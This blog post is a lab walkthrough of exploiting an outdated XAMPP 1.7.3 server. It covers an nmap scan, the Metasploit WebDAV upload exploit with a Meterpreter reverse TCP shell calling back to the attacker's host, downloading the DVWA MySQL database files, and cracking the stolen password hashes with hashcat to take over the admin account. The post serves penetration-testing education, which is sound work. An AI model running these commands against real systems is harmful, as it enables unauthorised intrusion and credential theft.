XAMPP 1.7.3 Exploitation

Posted on Updated on

In this post I’m going to concentrate on exploiting an older version of XAMPP server as well as stealing usernames and passwords from MySQL database tables from a particular website (DVWA) using the XAMPP vulnerability. The hacking tools that are used in this example are Metasploit msfconsole with Meterpreter payload as well as HashCat —hash cracking tool. The operating systems used are Windows XP SP3 (Firewall ON) for the victim and Kali Linux for the attacker.

XAMPP SETUP
On the victims machine, start all available server modules, Apache, MySQL, FileZilla, Mercury.
XAMPP Setup arr

SCANNING THE VICTIM
Next step includes finding out what type of software the victim runs as we don’t know that at the beginning of the hack. Open up terminal window in Kali and conduct a Version Nmap scan with the following piece of code. In this case 192.168.1.7 is the victims IP address.

nmap -sV 192.168.1.7

When the scan returns some data, we can see the victims server services that are running and the open ports they are communicating on. However it’s still not clear what type of the server it is. A quick Google search of these services will reveal that the victim is running XAMPP 1.7.3.

NMAP Scan

Services Turned On

Apache httpd 2.2.14

DAV/2

mod_ssl/2.2.14 OpenSSL/0.9.8l

mod_autoindex_color PHP/5.3.1

mod_apreq2-20090110/2.7.1

mod_perl/2.0.4 Perl/v5.10.1

XAMPP HACKING
Open another terminal windows and fire up msfconsole, and wait until it loads up and search for XAMPP vulnerabilities in Metasploit database.

msfconsole —starts msfconsole

search xampp —searches for XAMPP vulnerabilities

xampp search

An exploit shows up with a disclosure date of 14/01/2012. This is perfect as the release date of XAMPP 1.7.3 was 23/12/2009, so the vulnerability will still be exploitable.

use exploit/windows/http/xampp_webdav_upload_php

Now search and choose appropriate payload for this hack. In this example the payload will open a Meterpreter terminal session, which allows the attacker to view, download and modify files and directories of victim’s computer.

show payloads —shows all available payloads

set payload php/meterpreter/reverse_tcp —sets a particular payload

select payload

Now we need to look at the required options to set up to successfully execute the hack.

show options —shows required and non-required options to set up

We can see that some required rows such as LHOST (local host —attacker) and RHOST (remote host —victim) are empty, other required options such as PATH and RPORT are already filled up by default.

show options arr

set rhost 192.168.1.7 —sets the target address

set lhost 192.168.1.9 —sets the listen address

The exploit and the payload now have all the necessary information to conduct the attack.

exploit —attempts to exploit the target IP address

If the attack is successful, a Meterpreter command prompt will be displayed on screen.

meterpreter command prompt

If pwd (present working directory) command is executed you can see that the Meterpreter session has been opened in C:\xampp\webdav directory. The database files of the desired website are not located in this directory, therefore we need to search for it in the C:\xampp directory.

cd .. —moves to C:\xampp directory

ls —shows the content of C:\xampp directory

mysql find arr

A directory named mysql is located in C:\xampp\, let’s see what’s inside.

cd mysql —moves to C:\xampp\mysql\

cd data —moves to C:\xampp\mysql\data\

cd dvwa —moves to C:\xampp\mysql\data\dvwa\

ls —shows the contents of C:\xampp\mysql\data\dvwa\

I knew where the desired directory is located, you’d ls every time you move into a new directory to view the content.

The directory shows .MYD and .MYI file types, which are MySQL database files.

dvwa dir

To download all database files, the session needs to move outside of dvwa directory into data directory where the whole database directory can be downloaded onto the attacker machine.

cd .. —moves to C:\xampp\mysql\data\

download dvwa —downloads the dvwa directory where the database files are hidden

downloading

A whole source-code of the website and other system files or directories can be downloaded, modified or deleted or even new files uploaded, however that’s beyond the scope of this post.

PASSWORD CRACKING
The downloaded database directory will be located by default in \root\ directory on the attacker’s machine. Open up another terminal window and go to the downloaded database directory. The hashed passwords, usernames and file-paths to user pictures are located in the users.MYD

cat users.MYD —shows the contents on users.MYD file.

users.MYD file arr

Extract the stolen hashes to a text file. And save the text file as stolenhashes.txt in the /root/ directory.

stolenhashes

The tool that is used to crack the hashes in this example is HashCat with a RockYou hash dictionary, located in \root\Desktop.

hashcat -m 0 -a 0 /root/stolenhashes.txt /root/Desktop/rockyou.txt —will attempt to find given hashes in rockyou.txt dictionary.

cracked passwords arr

HashCat successfully cracked all of the hashes. The attacker now tries to login with the username and the corresponding cracked password.

DVWA Login page

SUCCESS!! The attacker now has a complete control over the administrator account.

DVWA Login page in

This entry was posted in Exploitation and tagged , , , , , , , , , , .

Leave a comment